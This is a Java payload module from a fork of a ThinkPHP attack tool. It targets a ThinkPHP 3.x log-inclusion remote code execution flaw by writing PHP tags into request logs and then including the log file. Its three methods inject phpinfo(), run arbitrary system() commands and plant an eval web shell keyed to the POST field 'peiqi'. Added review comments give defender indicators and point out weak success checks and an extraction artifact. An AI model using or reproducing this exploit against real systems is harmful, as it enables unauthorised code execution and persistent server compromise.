forked from Lotus6/ThinkphpGUI
tp3_log_rce.java
package exploit;
import com.github.kevinsawicki.http.HttpRequest;
import util.BasePayload;
import util.Result;
import java.util.ArrayList;
import java.util.Date;
/**
* Author 莲花 2021/7/21
*
* Payload module for the issue this tool reports as "ThinkPHP 3.x Log RCE".
* Every method works in two requests: the first puts a PHP tag into the query
* string of an ordinary request, the second asks the application to render the
* current day's runtime log through a {@code <name>[_filename]} parameter.
* NOTE(review): this presumably relies on the target logging the raw request
* and on a controller handing request arrays to the template layer; neither is
* visible in this file, confirm against the framework advisory.
*
* Reading this as a defender: the requests are recognisable in access logs by a
* {@code [_filename]} key whose value points into
* {@code Application/Runtime/Logs/}, and by a literal PHP open tag in the query
* string. All three methods modify the target's log file, including
* {@link #checkVUL}, so none of them is a passive check.
*/
public class tp3_log_rce implements BasePayload {
// Date captured once, when this payload object is constructed, from the local
// clock of the machine running the tool (not from the target).
Date dt = new Date();
String year = String.format("%tY", dt);
String mon = String.format("%tm", dt);
String day = String.format("%td", dt);
// Log file name in the form yy_MM_dd.log, built from the local date above.
String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log";
/**
* Probes {@code url} by writing a {@code phpinfo()} tag into the request and
* then requesting the day's log through each candidate parameter name.
*
* @param url base URL of the target; used as a plain string prefix
* @return a positive {@link Result} carrying the first candidate URL whose
*         response contains "PHP Version", otherwise a negative Result with
*         an empty third argument
* @throws Exception declared by the interface; request errors are caught and
*         printed inside the loop rather than propagated
*/
@Override
public Result checkVUL(String url) throws Exception {
// Marker text looked for in the response body of the second request.
String CheckStr = "PHP Version";
// Unlike the URLs below, this one appends "?" directly to url, with no "/".
String payload_log = url + "?m=Home&c=Index&a=index&test=--><?=phpinfo();?>";
// Anonymous ArrayList subclass with an instance initializer; it holds one
// URL per guessed parameter name, all pointing at the same log path.
ArrayList<String> log_rces = new ArrayList<String>() {{
add(url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&info[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
// NOTE(review): "¶m" looks like an HTML-entity artifact of "&param" picked
// up when this page was extracted; compare with the upstream file.
add(url + "/?m=Home&c=Index&a=index¶m[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&name[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&array[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&arr[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&list[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&page[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&menus[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&var[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&data[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
add(url + "/?m=Home&c=Index&a=index&module[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1);
}};
for (String log_rce : log_rces) {
try {
// The first request is repeated on every iteration; its body is read
// into 'log' but never used.
String log = HttpRequest.get(payload_log).body();
String res = HttpRequest.get(log_rce).body();
// A match means phpinfo() output came back, so the response also exposes
// the server's PHP configuration to whoever ran the check.
if (res.contains(CheckStr)) {
return new Result(true, "ThinkPHP 3.x Log RCE", log_rce);
}
} catch (Exception e) {
// A failed request is printed and the next candidate is tried.
e.printStackTrace();
}
}
return new Result(false, "ThinkPHP 3.x Log RCE", "");
}
/**
* Sends {@code cmd} wrapped in a PHP {@code system()} call, then requests the
* day's log through the fixed {@code value[_filename]} parameter.
*
* @param url base URL of the target; used as a plain string prefix
* @param cmd command text, concatenated into the request without escaping
* @return Result(true, null, logUrl) when the second request answers 200,
*         otherwise Result(false, null, ""); command output is not returned
* @throws Exception declared by the interface; request errors are caught and
*         printed
*/
@Override
public Result exeVUL(String url, String cmd) throws Exception {
// cmd is placed between single quotes with no quoting or URL encoding.
String log_exe = url + "/?m=Home&c=Index&a=index&test=--><?=system('"+cmd+"');?>";
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
try {
String log = HttpRequest.get(log_exe).body();
// Only the status code is inspected: a 200 is reported as success without
// confirming that anything ran, so a positive result here can be false.
int code = HttpRequest.get(log_res).code();
if (code == 200) {
return new Result(true, null, log_res);
}
}
catch (Exception e) {
e.printStackTrace();
}
return new Result(false, null, "");
}
/**
* Sends a PHP tag that evaluates the POST field {@code peiqi}, then requests
* the day's log through the fixed {@code value[_filename]} parameter.
*
* For incident response, the hard-coded field name "peiqi" in POST bodies sent
* to such a log-include URL is an indicator that this tool was used.
*
* @param url base URL of the target; used as a plain string prefix
* @return Result(true, null, logUrl + " Pass:peiqi") when the second request
*         answers 200; {@code null} in every other case, unlike the other two
*         methods, which return a negative Result
* @throws Exception declared by the interface; request errors are caught and
*         printed
*/
@Override
public Result getShell(String url) throws Exception {
String log_shell = url + "/?m=Home&c=Index&a=index&test=--><?=@eval($_POST['peiqi']);?>";
String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1;
try {
String log = HttpRequest.get(log_shell).body();
// As in exeVUL, success is inferred from the status code alone.
int code = HttpRequest.get(log_res).code();
if (code == 200) {
return new Result(true, null, log_res+" Pass:peiqi");
}
}
catch (Exception e) {
e.printStackTrace();
}
// Callers must handle null here.
return null;
}
}